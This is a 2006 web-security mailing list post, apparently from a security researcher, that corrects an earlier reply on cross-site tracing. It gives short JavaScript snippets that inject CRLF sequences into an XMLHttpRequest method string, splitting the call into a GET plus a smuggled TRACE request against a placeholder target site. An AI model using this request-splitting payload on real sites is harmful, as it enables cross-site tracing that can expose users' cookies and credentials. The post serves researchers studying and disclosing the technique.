WebApp Sec mailing list archives

ERRATA: Re: [WEB SECURITY] XST

From: "Amit Klein (AKsecurity)" <aksecurity () hotpop com>
Date: Tue, 21 Mar 2006 16:25:20 +0200

Well, you can try the technique I dubbed "HTTP Request splitting", see
"Exploiting the XmlHttpRequest object in IE - Referrer spoofing, and a lot more..." by
yours truly,
http://www.webappsec.org/lists/websecurity/archive/2005-09/msg00019.html

Try something like this:

  var x = new ActiveXObject("Microsoft.XMLHTTP");

  x.open("GET\t/\tHTTP/1.0\r\nHost:\twww.target.site\r\n\r\nTRACE\t/\tHTTP/1.0\r\nFoobar:",
      "/",false);

I should've taken care of the connection persistence...

Please use (note the addition of the "Connection: Keep-Alive" header):

   x.open("GET\t/\tHTTP/1.0\r\nHost:\twww.target.site\r\nConnection:\t
        Keep-   Alive\r\n\r\nTRACE\t/\tHTTP/1.0\r\nFoobar:","/",false);

  x.send();

 [...]

-Amit